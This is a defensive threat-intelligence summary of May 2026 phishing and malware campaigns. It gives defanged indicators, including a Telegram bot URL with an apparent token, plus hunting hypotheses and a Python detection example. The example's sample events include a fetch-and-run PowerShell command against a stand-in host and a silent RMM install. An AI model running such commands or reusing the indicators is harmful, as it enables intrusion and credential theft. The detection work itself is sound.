Major Cyber Attacks in May 2026: Fake Invitations, Agent Tesla, BlobPhish, and More
In May 2026, ANY.RUN observed a surge in sophisticated phishing and malware campaigns utilizing fileless execution, browser-based credential theft, and legitimate workflow abuse. Key threats included Agent Tesla credential harvesting, ClickFix fileless malware, BlobPhish in-memory page generation, and phishing-to-RMM chains bypassing traditional MFA via real-time OTP interception.
Authors: ANY.RUN
Source: ANY.RUN
- Domain claimalerts-esl-org[.]cfd: Phishing domain impersonating a financial organization for OTP interception.
- Domain horeca-bucuresti[.]ro: Compromised FTP server domain used for exfiltrating credentials in the Agent Tesla campaign.
- Domain mtl-logistics[.]com: Domain used in the BlobPhish campaign to load pseudo-MS365 pages as blob objects.
- Domain rressseentrsvv[.]de: Domain hosting a fake Word Online phishing page that triggers silent RMM deployment.
- IP 158[.]94[.]208[.]104: Payload host IP address serving my_new_l.bin and my_s.bin in the ClickFix attack chain.
- IP 158[.]94[.]208[.]92: Stage-2 PowerShell loader IP address used in the ClickFix attack chain.
- IP 178[.]16[.]52[.]232: PowerShell stager IP address used in the ClickFix attack chain.
- IP 91[.]92[.]243[.]161: Custom TCP C2 server IP address (port 3038) used in the ClickFix attack chain.
- URL hxxp://claimalerts-esl-org[.]cfd/otp[.]php: Endpoint used for OTP exfiltration in the OTP phishing campaign.
- URL hxxp://claimalerts-esl-org[.]cfd/pass[.]php: Endpoint used for credential exfiltration in the OTP phishing campaign.
- URL hxxps://api[.]telegram[.]org/bot7712998039:AAE_woKt3s2-PPJnELquYVNYJ64HWJwkApQ/sendMessage: Telegram bot API URL used for exfiltrating stolen credentials and OTPs.
- URL hxxps://rressseentrsvv[.]de/share-point/attention[.]html: Specific URL hosting the fake Word Online phishing page.
What Happened
In May 2026, cybercriminals launched several deceptive attacks designed to look like normal business activities, such as fake event invitations and standard document sharing. These attacks targeted employees in finance, HR, and IT to steal passwords, intercept login codes, and secretly install remote access software. Because these threats hide within trusted websites and everyday tasks, they are much harder for standard security tools to catch. Organizations should ensure their security teams have the tools to analyze suspicious links and files in safe environments before they cause harm.
Key Takeaways
- Phishing campaigns are increasingly leading to direct access risks like credential theft, OTP interception, and RMM installation.
- Attackers are abusing trusted workflows (fake invitations, Word Online pages, B2B websites) to delay detection.
- Fileless and browser-based techniques (BlobPhish, injected scripts) are reducing visibility for traditional security controls.
- Real-time OTP interception is successfully bypassing standard MFA protections.
Affected Systems
- Windows
- Web Browsers
- Microsoft 365
- Corporate Email
- Finance and Banking Portals
Attack Chain
Attackers utilized various initial access vectors, including fake event invitations, business document lures, and compromised B2B websites. These lures redirected victims to credential harvesting pages, triggered fileless PowerShell execution (ClickFix), or initiated silent MSI installations of RMM tools like ScreenConnect. Once initial access or credentials were obtained, attackers exfiltrated data via FTP or Telegram bots, and established persistence using hidden remote access tools.
Detection Availability
- YARA Rules: No
- Sigma Rules: No
- Snort/Suricata Rules: No
- KQL Queries: No
- Splunk SPL Queries: No
- EQL Queries: No
- Other Detection Logic: No
The article does not provide specific detection rules, but mentions that ANY.RUN Enterprise Suite includes YARA Premium and TI Lookup capabilities for threat validation.
Detection Engineering Assessment
- EDR Visibility: High — EDR solutions can detect PowerShell execution, process injection into svchost.exe, and the silent installation of RMM tools like ScreenConnect.
- Network Visibility: Medium — Network visibility is effective for detecting outbound connections to known C2 IPs and Telegram API exfiltration, but may struggle with BlobPhish in-memory page generation and encrypted traffic.
- Detection Difficulty: Moderate — The use of legitimate RMM tools, fileless execution, and in-browser blob generation complicates detection, requiring behavioral analysis rather than static signatures.
Required Log Sources
- Process Creation (Event ID 4688)
- PowerShell Operational Logs (Event ID 4104)
- Network Connection Logs
- DNS Query Logs
Hunting Hypotheses
| Hypothesis | Telemetry | ATT&CK Stage | FP Risk |
|---|---|---|---|
| Consider hunting for unexpected PowerShell execution utilizing Invoke-Expression (IEX) or Invoke-RestMethod (IRM) originating from browser processes. | Process Creation, PowerShell Script Block Logging | Execution | Medium |
| Evaluate whether silent installations of RMM tools like ScreenConnect are occurring outside of approved IT maintenance windows. | Process Creation, File Creation | Persistence | Low |
| Consider hunting for unexpected outbound network connections to the Telegram API (api.telegram.org) from user endpoints, which may indicate data exfiltration. | Network Connection Logs, DNS Query Logs | Exfiltration | Low |
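The three hypotheses in the table above, written as an added example (not part of the ANY.RUN report) as Python checks run over constructed, hypothetical process-creation and network event records. The event field names, the browser image list, the RMM package names, the 02:00-05:00 maintenance window and the Telegram allowlist are all assumptions for the demonstration.

```python
"""Added example (not from the ANY.RUN report): the three hunting hypotheses as
checks over constructed events. The dict shape is hypothetical, not an EDR schema."""
import re

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}          # assumed browser images
RMM_INSTALLERS = ("screenconnect", "connectwise")              # assumed package names
TELEGRAM_ALLOWLIST = {"telegram.exe"}                          # assumed approved client
IEX_IRM = re.compile(r"\b(iex|irm|invoke-expression|invoke-restmethod)\b", re.I)

def browser_spawned_powershell(ev):
    """H1: PowerShell using IEX/IRM whose parent process is a browser."""
    return (ev.get("type") == "process"
            and ev["image"].lower() == "powershell.exe"
            and ev["parent"].lower() in BROWSERS
            and IEX_IRM.search(ev.get("cmdline", "")) is not None)

def rmm_install_outside_window(ev, maintenance_hours=range(2, 5)):
    """H2: quiet msiexec install of an RMM package outside the assumed 02:00-05:00 window."""
    cmd = ev.get("cmdline", "").lower()
    return (ev.get("type") == "process"
            and ev["image"].lower() == "msiexec.exe"
            and ("/qn" in cmd or "/quiet" in cmd)
            and any(name in cmd for name in RMM_INSTALLERS)
            and ev["hour"] not in maintenance_hours)

def telegram_from_user_endpoint(ev):
    """H3: outbound connection to api.telegram.org from any process not explicitly approved."""
    return (ev.get("type") == "network"
            and ev.get("dest_host") == "api.telegram.org"
            and ev["image"].lower() not in TELEGRAM_ALLOWLIST)

CHECKS = (("browser->powershell IEX/IRM", browser_spawned_powershell),
          ("silent RMM install", rmm_install_outside_window),
          ("telegram exfil", telegram_from_user_endpoint))

def hunt(events):
    """Return (event id, hypothesis name) for every event that matches a check."""
    return [(ev["id"], name) for ev in events for name, check in CHECKS if check(ev)]

# Constructed sample telemetry: one true positive per hypothesis plus benign noise.
SAMPLE_EVENTS = [
    {"id": 1, "type": "process", "image": "powershell.exe", "parent": "msedge.exe", "hour": 10,
     "cmdline": 'powershell -w hidden -c "iex (irm http://payload.invalid/x)"'},
    {"id": 2, "type": "process", "image": "msiexec.exe", "parent": "chrome.exe", "hour": 14,
     "cmdline": "msiexec /i ScreenConnect.ClientSetup.msi /qn"},
    {"id": 3, "type": "network", "image": "powershell.exe", "dest_host": "api.telegram.org"},
    {"id": 4, "type": "process", "image": "powershell.exe", "parent": "explorer.exe", "hour": 9,
     "cmdline": "powershell -File C:\\scripts\\backup.ps1"},
]
```

Tuning the maintenance window and the allowlist to the environment is what keeps the FP risk at the levels the table gives; event 4 (a scheduled script launched from explorer.exe) is there to show that plain PowerShell execution alone does not fire H1.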
Control Gaps
- Traditional MFA (vulnerable to real-time OTP interception)
- Static URL filtering (bypassed by BlobPhish and compromised legitimate sites)
Key Behavioral Indicators
- PowerShell injecting into svchost.exe
- Execution of HideUL or similar concealment tools
- Browser processes spawning MSI installers
False Positive Assessment
- Low
Recommendations
Immediate Mitigation
- Verify against your organization's incident response runbook and team escalation paths before acting.
- Consider blocking the identified C2 IP addresses and phishing domains at the network perimeter.
- Evaluate whether recent installations of ScreenConnect or other RMM tools on user endpoints were authorized.
Infrastructure Hardening
- If supported by your identity provider, consider implementing FIDO2/WebAuthn hardware keys to mitigate real-time OTP interception.
- Evaluate whether PowerShell execution can be restricted to signed scripts only.
User Protection
- Consider implementing endpoint controls that restrict browser processes from launching command-line interpreters or installers.
- If applicable, evaluate whether access to known file-sharing and remote access domains can be restricted for non-IT personnel.
Security Awareness
- Consider updating security awareness training to highlight the risks of fake event invitations and unexpected business document lures.
- Evaluate whether employees can be trained to verify the legitimacy of OTP requests and recognize signs of browser-based phishing.
MITRE ATT&CK Mapping
- T1566.001 - Phishing: Spearphishing Attachment
- T1566.002 - Phishing: Spearphishing Link
- T1059.001 - Command and Scripting Interpreter: PowerShell
- T1055 - Process Injection
- T1119 - Automated Collection
- T1048 - Exfiltration Over Alternative Protocol
- T1219 - Remote Access Software
- T1564 - Hide Artifacts
Additional IOCs
- URLs:
  - hxxp://claimalerts-esl-org[.]cfd/pass.php: Endpoint used for credential exfiltration in the OTP phishing campaign.
  - hxxp://claimalerts-esl-org[.]cfd/otp.php: Endpoint used for OTP exfiltration in the OTP phishing campaign.
  - hxxps://rressseentrsvv[.]de/share-point/attention.html: Specific URL hosting the fake Word Online phishing page.
- Command Lines:
  - Purpose: Execute fileless ClickFix payload | Tools: powershell.exe | Stage: Execution | Cmdlet: IEX
  - Purpose: Execute fileless ClickFix payload via REST method | Tools: powershell.exe | Stage: Execution | Cmdlet: IRM
- Other:
  - my_new_l.bin: In-memory payload executed inside powershell.exe during the ClickFix attack.
  - my_s.bin: .NET payload injected into svchost.exe during the ClickFix attack.
  - HideUL_x64.exe: Activity concealment tool executed after silent RMM deployment.